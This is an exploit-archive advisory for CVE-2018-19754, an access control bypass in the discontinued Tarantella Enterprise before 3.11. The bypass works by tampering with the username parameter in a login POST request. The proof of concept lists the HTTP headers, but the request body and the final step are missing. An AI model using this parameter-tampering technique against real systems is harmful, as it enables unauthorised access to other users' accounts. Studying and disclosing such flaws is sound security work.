Tarantella Enterprise Security Bypass

Tarantella Enterprise versions prior to 3.11 suffer from an access control bypass vulnerability.

MD5 | 5483d7f4c65c36910dc13bee725ae799

Vulnerability found in 2009.

# Exploit Title: Security Bypass Access Control Vulnerability in Tarantella
Enterprise before 3.11
# Date: 30-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: the product is discontinued (vulnerability found in 2009)
# Version: Tarantella Enterprise before 3.11
# Tested on: All
# CVE : CVE-2018-19754
# Category: webapps

1. Description

Tarantella Enterprise before 3 3.11 allows a Bypass Access Control, the
application does not prevent one user from gaining access to another user's
by modifying the parameter value in a login request.

2. Proof of Concept

Send POST petition like:

Accept: */*
Referer: https://XXXX.XXXX:444/html/form_ttaXXXX.html
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
InfoPath.1; .NET CLR 2.0.50727)
Host: ttarima.cnso
Content-Length: 61
Connection: Keep-Alive
Cache-Control: no-cache


Where the parameter un is the username you know. You recive the message:

"The content of this file must be language independent! This applet
immediately loads a new document in a named frame (here WebtopFrame), which
will be something like: ../logintheme/clientcap/index.html. The logintheme
is determinated from the appropiate attribute in the datastore. -->"

And now, change the username to access to application:


3. Solution:

The product is discontinued.


Related Posts